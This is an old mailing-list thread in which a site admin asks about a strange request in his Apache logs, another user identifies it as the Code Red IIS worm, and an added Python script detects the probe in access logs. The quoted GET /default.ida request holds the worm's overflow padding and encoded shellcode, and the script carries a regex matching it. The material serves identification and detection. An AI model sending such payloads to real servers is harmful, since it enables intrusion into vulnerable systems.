Philip S Tellis [Thu, Jul 19, 2001 at 06:47:04PM +0530]:
Somebody's trying to request this: (adjusted to fit the page)
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a
from my web server (Apache 1.3.17)
Does it look like a standard buffer overflow exploit? Doesn't seem to have caused any harm yet, but this has been tried over and over again.
It's the Code Red ida worm. It affects IIS and is supposed to DoS www.whitehouse.gov after the 20th of the month. Check the link from /.
Sharukh.
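
A log check for the request quoted in this thread, added here as an example and not written by either poster: it scans Apache Common Log Format lines for the `/default.ida?` probe shape and counts hits per source address. The sample log lines, their addresses and timestamps, the function name and the 100-character padding floor are constructed assumptions; only the `%u` escapes are copied from the quoted request.

```python
import re
from collections import Counter

# Apache Common Log Format: host ident user [time] "request line" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Shape of the request quoted in the thread: /default.ida? + a long run of one
# filler letter + %uXXXX escapes. The 100-character floor is an assumption.
PROBE = re.compile(r'^/default\.ida\?([A-Za-z])\1{99,}(?:%u[0-9a-fA-F]{4})+', re.I)


def find_probes(lines):
    """Return (hits per source address, number of probes not answered 4xx)."""
    per_source, not_rejected = Counter(), 0
    for line in lines:
        m = CLF.match(line)
        if not m:                       # truncated or non-CLF line: skip it
            continue
        src, _method, target, status = m.groups()
        if PROBE.match(target):
            per_source[src] += 1
            if not status.startswith("4"):
                not_rejected += 1       # server did not refuse it: investigate
    return per_source, not_rejected


# Constructed sample log (documentation addresses, invented timestamps).
PAD = "N" * 224
ENC = "%u9090%u6858%ucbd3%u7801"        # escapes copied from the quoted request
REQ = f'"GET /default.ida?{PAD}{ENC}%u00=a  HTTP/1.0" 404 205'
SAMPLE = [
    f'192.0.2.10 - - [19/Jul/2001:18:40:01 +0530] {REQ}',
    f'192.0.2.10 - - [19/Jul/2001:18:41:12 +0530] {REQ}',
    f'198.51.100.7 - - [19/Jul/2001:18:43:30 +0530] {REQ}',
    '203.0.113.5 - - [19/Jul/2001:18:44:02 +0530] "GET /index.html HTTP/1.0" 200 1043',
    '203.0.113.5 - - [19/Jul/2001:18:44:09 +0530] "GET /default.ida?NNNN HTTP/1.0" 404 205',
    'not a log line',
]

if __name__ == "__main__":
    hits, not_rejected = find_probes(SAMPLE)
    for src, count in hits.most_common():
        print(f"{src}\t{count} probe(s)")
    print(f"probes not answered with 4xx: {not_rejected}")
```

On a server without the .ida mapping every hit should carry a 4xx status, so a non-zero second value is the part to look at first.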